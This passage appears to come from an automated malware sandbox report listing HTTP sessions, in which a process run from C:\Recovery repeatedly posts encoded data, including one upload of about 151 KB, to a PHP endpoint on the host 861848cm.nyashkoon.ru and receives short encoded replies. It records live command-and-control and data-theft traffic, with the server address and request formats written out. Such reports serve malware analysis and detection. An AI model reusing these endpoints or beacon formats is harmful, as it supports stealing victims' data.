                                                                    Data Raw: 56 4a 7d 5d 78 0b 77 00 78 5c 63 5b 6b 62 68 5e 7e 59 5a 50 6b 70 65 0b 6e 73 78 4f 7d 71 67 5d 74 5d 6a 52 79 61 79 4a 62 76 73 5b 69 5b 78 01 55 4b 71 0c 77 62 74 58 6b 4c 75 4d 68 5e 6a 0a 79 65 70 0c 7d 5d 51 03 76 5c 71 04 77 61 5b 47 7f 5f 54 04 7e 7c 7f 54 69 67 64 5a 75 4c 7b 06 7c 5b 69 47 7d 59 6e 58 78 59 5e 07 79 67 78 4c 6f 54 63 4b 79 62 70 04 78 5d 5c 06 7c 63 60 4b 6c 77 73 59 7e 72 78 5c 76 71 74 03 7a 51 41 5b 7f 5e 68 4f 6b 4f 7d 0b 61 55 6c 41 6f 7c 60 03 74 60 72 43 6d 58 6d 48 7e 6c 66 06 7b 71 7e 48 62 60 7f 4b 75 72 7f 5a 60 07 62 50 7e 5d 79 5f 60 5c 6d 04 61 66 6c 09 7f 7c 65 04 77 6f 6c 04 7f 5a 7c 02 6f 6c 67 03 7a 60 66 4b 7c 6d 6f 51 77 01 7f 5f 7e 62 62 09 7e 7d 74 52 78 43 5c 4f 7e 04 75 04 7b 5d 46 51 7f 6c 51 51 7e 60 5d 55 7e 74 7a 4c 6c 6d 77 44 7b 72 78 04 7f 62 77 02 7d 59 55 0d 7c 59 7a 50 6e 73 7b 58 6a 62 7c 01 76 60 79 51 7b 5c 79 4a 76 76 78 07 7e 76 64 4f 7f 76 75 0d 74 72 73 01 7c 62 69 06 7f 49 76 09 78 58 7c 41 7e 63 7f 4a 75 72 79 06 77 71 61 00 7c 71 [TRUNCATED]
                                                                    Data Ascii: VJ}]xwx\c[kbh^~YZPkpensxO}qg]t]jRyayJbvs[i[xUKqwbtXkLuMh^jyep}]Qv\qwa[G_T~|TigdZuL{|[iG}YnXxY^ygxLoTcKybpx]\|c`KlwsY~rx\vqtzQA[^hOkO}aUlAo|`t`rCmXmH~lf{q~Hb`KurZ`bP~]y_`\mafl|ewolZ|olgz`fK|moQw_~bb~}tRxC\O~u{]FQlQQ~`]U~tzLlmwD{rxbw}YU|YzPns{Xjb|v`yQ{\yJvvx~vdOvutrs|biIvxX|A~cJurywqa|qb~R`}gcv_czru}NqD{Y^N{wZO{S{FzLVxs~^pygd~b]wqVG~RcE}wR@Ouw|ZxBVt^vyaq|lv{O~HwssJualwOT`fwbSLveZ~lWtRt~s`DxRozpfClAtItbr~m]{mzbWpRB}lppx|gfxS{rdI_w}I]~pqzc|}bdtMuzqqvXZ|fh}vawrkbi}gfyvZB}cHv\uta_G|OfF}RV~wQua{LqI~^y{gZ{Y`{}gzrxIx]v{]NZ{ddDj\gwrx~RtXhd||bRaw^xBc[c`~yOf]jz_z\yvxBagx[L~Jx^fNtrr]b[RRyt|R~`txlUl`~|}xt^`}L}PzSYQQT[]jafWlcWPNRIKP{}BldIUwUrZDP^kc~npoXincB]pjKVT_[^sKRjk_Tun}[VFPq]h{~PzqpA|s`Yab_`Oqk_Xj|^iYcwq^\xby}cj_{glxZpS@x_maFWaXScUU^cKWa`M\v|zRsJA|aeLuRlAyRVFp]@PnbFPKo_D`xC\}^_v\}|hcKD`nu\trsVkoB[po[P`UUU`\TcF{SVPotoinzQz|VonAR~fY [TRUNCATED]
                                                                    Nov 6, 2024 03:37:15.592714071 CET285INData Raw: 5d 68 61 09 42 50 7b 65 57 57 65 0c 5e 6a 05 0b 01 5a 58 6a 4f 5c 60 76 46 6b 72 66 58 7f 51 7f 6f 65 4a 7b 40 71 58 56 5c 57 05 7a 43 57 63 5c 43 54 5f 00 5e 54 00 6f 40 52 71 78 04 63 5b 73 45 6f 64 7e 00 7b 58 6f 46 57 6b 67 5f 69 75 74 63 5c
                                                                    Data Ascii: ]haBP{eWWe^jZXjO\`vFkrfXQoeJ{@qXV\WzCWc\CT_^To@Rqxc[sEod~{XoFWkg_iutc\rsi`{UPh_cbU[UU\lkxBpYSUVvCWoWFWY[ZYbZ[[e}Sa[p\W\qXNQkfCZAkUFnxDWZaCPToL]v^RabQ|PQyz}Xja@P|gVSo_RswRkeo~gZy_xX}vx]idOS|fVU`SRqDc\Pbb_qX
                                                                    Nov 6, 2024 03:37:15.825807095 CET285INData Raw: 5d 68 61 09 42 50 7b 65 57 57 65 0c 5e 6a 05 0b 01 5a 58 6a 4f 5c 60 76 46 6b 72 66 58 7f 51 7f 6f 65 4a 7b 40 71 58 56 5c 57 05 7a 43 57 63 5c 43 54 5f 00 5e 54 00 6f 40 52 71 78 04 63 5b 73 45 6f 64 7e 00 7b 58 6f 46 57 6b 67 5f 69 75 74 63 5c
                                                                    Data Ascii: ]haBP{eWWe^jZXjO\`vFkrfXQoeJ{@qXV\WzCWc\CT_^To@Rqxc[sEod~{XoFWkg_iutc\rsi`{UPh_cbU[UU\lkxBpYSUVvCWoWFWY[ZYbZ[[e}Sa[p\W\qXNQkfCZAkUFnxDWZaCPToL]v^RabQ|PQyz}Xja@P|gVSo_RswRkeo~gZy_xX}vx]idOS|fVU`SRqDc\Pbb_qX
                                                                    Nov 6, 2024 03:37:16.150788069 CET272OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 384
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:16.388700008 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:16.388885975 CET384OUTData Raw: 56 50 5f 58 53 5c 55 5f 5a 5f 52 51 54 5b 5b 52 55 57 59 57 51 54 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VP_XS\U_Z_RQT[[RUWYWQTRSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%8/2W+8;>0(]==_?-'8/#/W(>:0!4&_%'X$.Q-"
                                                                    Nov 6, 2024 03:37:16.702791929 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 5d 3c 39 2e 5e 24 02 3b 0a 29 00 39 5a 3c 20 27 5f 2d 31 3b 03 29 23 27 03 2b 38 20 55 37 01 30 05 36 21 3d 13 20 1c 06 02 2b 01 21 5f 05 1d 39 12 27 39 34 51 2a 1c 3a 5f 3d 34 3f 1e 32 20 3b 1c 28 28 2e 5a 22 39 2a 56 32 00 26 03 25 22 34 0a 2b 34 2d 5e 3a 59 27 51 26 10 2a 57 09 16 20 1f 24 23 23 5f 28 31 0e 00 27 2e 25 58 31 3a 0e 0f 3e 3c 3f 12 20 42 22 5f 3d 55 37 12 23 37 00 13 30 14 2d 19 25 3d 23 19 2b 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: ]<9.^$;)9Z< '_-1;)#'+8 U706!= +!_9'94Q*:_=4?2 ;((.Z"9*V2&%"4+4-^:Y'Q&*W $##_(1'.%X1:><? B"_=U7#70-%=#+&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.44973237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:16.652483940 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:17.000858068 CET1012OUTData Raw: 53 52 5f 5f 53 5c 55 5e 5a 5f 52 51 54 5b 5b 5c 55 57 59 5f 51 53 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SR__S\U^Z_RQT[[\UWY_QSR_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&;<8$(;=:-^)*$(#"?9<#Y.%'#$!%)'X$.Q-"
                                                                    Nov 6, 2024 03:37:17.467147112 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:17.540344954 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.44973437.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:16.864624977 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:17.219523907 CET1252OUTData Raw: 53 52 5a 5f 53 58 50 5f 5a 5f 52 51 54 5f 5b 58 55 53 59 5b 51 52 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SRZ_SXP_Z_RQT_[XUSY[QRRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,/*S?>#3)>*-:]3;4 !<7.&<4'2\%'X$.Q-2
                                                                    Nov 6, 2024 03:37:17.676539898 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:17.756405115 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 23 06 28 29 26 59 24 05 3b 0b 29 10 0c 00 3f 33 3b 14 2d 22 23 01 3e 1d 3c 5d 3e 28 23 0d 20 06 2f 14 35 32 3e 03 37 0b 23 59 28 01 21 5f 05 1d 39 5b 30 17 30 55 3d 54 2a 5f 2a 0e 34 0a 25 23 24 0b 29 15 3a 59 23 2a 3a 53 24 2e 3e 03 26 22 0d 18 2a 27 29 5a 3a 59 20 0e 26 00 2a 57 09 16 20 54 27 30 2f 5a 3e 32 33 13 33 07 36 01 32 39 24 0f 29 12 06 02 37 1d 3e 5e 2b 33 3b 5b 21 37 3a 1e 26 2a 2a 44 31 3d 33 51 28 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: #()&Y$;)?3;-"#><]>(# /52>7#Y(!_9[00U=T*_*4%#$):Y#*:S$.>&"*')Z:Y &*W T'0/Z>233629$)7>^+3;[!7:&**D1=3Q("&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.44973637.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:17.739382029 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:18.094842911 CET1012OUTData Raw: 53 52 5f 58 53 5b 50 5a 5a 5f 52 51 54 5e 5b 5c 55 54 59 56 51 54 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SR_XS[PZZ_RQT^[\UTYVQTR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%\//6U=84($]=9=_*->0/4.P<=?:<^4$"1'X$.Q-6
                                                                    Nov 6, 2024 03:37:18.561522007 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:18.634757996 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:37:18.641371965 CET275OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 151876
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:19.001209974 CET13596OUTData Raw: 53 52 5f 58 56 57 50 58 5a 5f 52 51 54 5d 5b 53 55 53 59 5b 51 5e 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SR_XVWPXZ_RQT][SUSY[Q^R\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8/.S<;+?38\>^*>&_'^4"/9(09%$^7711'X$.Q-
                                                                    Nov 6, 2024 03:37:19.408320904 CET1236OUTData Raw: 53 52 5f 58 56 57 50 58 5a 5f 52 51 54 5d 5b 53 55 53 59 5b 51 5e 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SR_XVWPXZ_RQT][SUSY[Q^R\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8/.S<;+?38\>^*>&_'^4"/9(09%$^7711'X$.Q-
                                                                    Nov 6, 2024 03:37:19.778764963 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:19.779417992 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:19.779597998 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:19.780448914 CET2472OUTData Raw: 09 2c 03 11 33 22 20 1c 07 24 0d 0d 0a 51 13 17 39 3f 34 21 2a 16 37 36 31 2c 33 2a 29 0c 1f 04 3e 22 23 22 32 5f 27 2f 34 08 0a 18 2b 23 27 1d 33 36 13 13 3e 02 02 13 05 3f 0f 10 28 55 02 22 00 23 54 1a 03 31 23 5c 06 05 50 35 22 3c 12 38 39 3e
                                                                    Data Ascii: ,3" $Q9?4!*761,3*)>"#"2_'/4+#'36>?(U"#T1#\P5"<89>.280&Y/<1:++/U9*3;=#T$6X?])?2? ,7@><Z//<.("031Y\?R#,84945U).93%9/9(+T&;; -#6%W6X2*.##.8&.:*$++&@
                                                                    Nov 6, 2024 03:37:19.780575037 CET2472OUTData Raw: 35 56 1e 1e 23 2b 07 23 0c 05 03 32 0f 10 28 10 07 37 21 36 39 0a 02 0c 03 3f 27 2b 3d 2b 3f 21 3a 1a 32 5d 27 2e 03 42 25 2f 0a 56 3d 20 2e 2c 27 54 23 32 27 00 34 29 3e 00 23 18 30 21 26 3c 33 05 03 1e 27 3b 1d 28 2b 32 1e 59 29 07 10 2c 23 3f
                                                                    Data Ascii: 5V#+#2(7!69?'+=+?!:2]'.B%/V= .,'T#2'4)>#0!&<3';(+2Y),#?^>^#>"=T1?[/P!<<[))&5=1=3,?!_#.1'634"2;</;2?."<<7#P T*P8X48\ W,?2>3!*$)/=*U)1+A<T&3<96?:'>"'(76,ZP>!4"*-#+^0#8==!
                                                                    Nov 6, 2024 03:37:19.781166077 CET7416OUTData Raw: 0f 20 32 3c 3c 2e 30 22 35 5b 2a 38 2c 57 14 1f 3b 35 33 0c 32 56 13 04 03 19 06 47 39 3c 05 01 3d 5f 17 5f 34 14 07 2b 08 3e 29 1f 3a 1c 24 3b 2b 37 3e 2a 39 01 23 1f 27 3c 29 3b 38 5d 23 3f 3c 32 09 1c 35 55 2c 03 38 22 3d 59 25 3b 20 25 21 3d
                                                                    Data Ascii: 2<<.0"5[*8,W;532VG9<=__4+>):$;+7>*9#'<);8]#?<25U,8"=Y%; %!=9'&52Z6%9;_&*6:<8#6Z@"83(+%-F2,2>81%",/2'!Z5.3 \#/\4^$,^?\.>?=4$2B'!$?04+-)38W)/!??*5?Y; 32'#6^ZT#*<",$*3U/
                                                                    Nov 6, 2024 03:37:19.781285048 CET3708OUTData Raw: 06 38 23 0d 0f 3f 0a 15 3e 0b 1c 26 0c 57 20 20 05 58 3e 31 33 30 17 1c 0d 25 33 15 37 20 25 2f 04 0f 24 40 3e 09 58 08 3e 02 10 5b 37 03 39 14 26 2f 0b 1e 39 1c 2c 33 07 41 21 5c 3a 05 09 1d 24 5a 39 50 0d 27 19 50 3e 32 1e 02 30 21 06 3c 3c 3c
                                                                    Data Ascii: 8#?>&W X>130%37 %/$@>X>[79&/9,3A!\:$Z9P'P>20!<<<)>(0?/_"_>0451Z\=C<=S*AW<# 1/?G=8':C-<$5.=Y$>;Y&<#6< :3[T Z5?!$&7'<>- +Z<7A$"R!9?-$?6];=>U)U__2?82;7W_.U&91*86"
                                                                    Nov 6, 2024 03:37:19.781305075 CET2472OUTData Raw: 3b 5c 05 3c 0a 1c 35 23 14 0c 0c 04 3e 3c 5f 50 02 2c 32 30 26 0a 2b 09 22 3f 37 50 38 2c 3c 3a 3b 13 21 5c 06 00 0f 22 20 00 37 06 15 0d 37 2d 2a 14 32 38 23 3d 08 5e 3f 3f 55 13 3e 59 0c 1f 35 5b 0e 21 39 34 11 5e 37 3b 26 5e 32 01 24 3a 32 34
                                                                    Data Ascii: ;\<5#><_P,20&+"?7P8,<:;!\" 77-*28#=^??U>Y5[!94^7;&^2$:24<5>201?X5^71'? 3\+S:;3=,""3Z4140]18 U <4<;3]]4U 402.0>>8<5VZ(>;31<T4D=(VX;)%R/Q'#4#U#1,'PR:38 933'-6& &02 5V&76+)<:-SA8[
                                                                    Nov 6, 2024 03:37:19.781327963 CET1236OUTData Raw: 3e 22 3b 06 3e 03 35 30 3a 39 5b 55 39 32 0c 19 0c 0a 16 25 2a 34 07 15 3a 07 1a 0b 0d 3e 32 51 3e 38 1d 2f 33 32 3c 5e 31 26 1e 3c 3b 32 18 2d 3e 29 1a 07 12 5b 24 5b 3c 26 1f 05 37 2f 37 1c 3d 51 5e 26 3e 3b 22 43 0f 32 30 3b 33 25 03 0b 38 22
                                                                    Data Ascii: >";>50:9[U92%*4:>2Q>8/32<^1&<;2->)[$[<&7/7=Q^&>;"C20;3%8"$85Z^'<6)"V5&43.&;"-<4:Y0_?!/<R+79D:**6&[:$+"?423-C;]%>4)24;)PR>316?-*]+8>$3478"Z3+/1? ?,#T*)>?_60>4,X
                                                                    Nov 6, 2024 03:37:19.781342030 CET1236OUTData Raw: 35 0d 30 12 2a 0d 33 1c 32 28 3b 0d 37 2c 3c 3b 3a 0a 08 20 3f 33 20 58 3f 12 2e 18 35 23 22 3c 27 2b 37 53 00 57 13 3f 28 34 11 39 3f 27 54 32 29 5d 56 08 0c 5c 5e 2a 0f 00 2a 20 32 0b 34 39 01 1c 22 1c 2d 2e 1d 51 26 31 25 00 36 37 23 12 3e 0e
                                                                    Data Ascii: 50*32(;7,<;: ?3 X?.5#"<'+7SW?(49?'T2)]V\^** 249"-.Q&1%67#>S:W,99E&%( ?<<9?C=;/W$5))?-7P2&"W$767;;^)-0+.!&[,( &*:+4'!>=?>1X1%++3#:5[/*;!;,S3-!-;%1?_9Y"*0>;:2)P61._
                                                                    Nov 6, 2024 03:37:20.764262915 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.44974037.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:19.780555964 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:20.125818968 CET1012OUTData Raw: 56 51 5f 5e 56 5a 50 5b 5a 5f 52 51 54 58 5b 5f 55 55 59 56 51 5f 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQ_^VZP[Z_RQTX[_UUYVQ_RSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&;Y>?(^+34(*%Z*^%88_"<.?#Z960_#129'X$.Q-.
                                                                    Nov 6, 2024 03:37:20.585585117 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:20.656322002 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.44974337.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:21.003155947 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:21.391925097 CET1012OUTData Raw: 53 55 5a 5a 53 5f 50 5b 5a 5f 52 51 54 5e 5b 5b 55 50 59 5e 51 53 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SUZZS_P[Z_RQT^[[UPY^QSR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,Y-<(_<0<Y>)%'4Z7?9<.+Y,54$%&)'X$.Q-6
                                                                    Nov 6, 2024 03:37:21.813747883 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:21.889919043 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.44974437.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:22.031343937 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:22.375691891 CET1012OUTData Raw: 56 51 5f 5f 53 5f 50 5f 5a 5f 52 51 54 5e 5b 5c 55 57 59 59 51 50 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQ__S_P_Z_RQT^[\UWYYQPR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%Y-?.R+(]> <)1=-*]'8#-?(.%_#7129'X$.Q-6


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.44974737.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:22.779226065 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
